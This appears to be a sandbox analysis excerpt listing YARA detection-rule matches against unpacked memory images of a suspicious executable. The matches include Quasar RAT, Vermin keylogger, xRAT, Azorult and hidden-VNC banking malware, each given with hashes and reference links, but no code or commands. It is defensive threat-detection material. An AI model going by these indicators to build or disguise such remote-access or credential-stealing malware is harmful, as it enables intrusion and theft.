Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
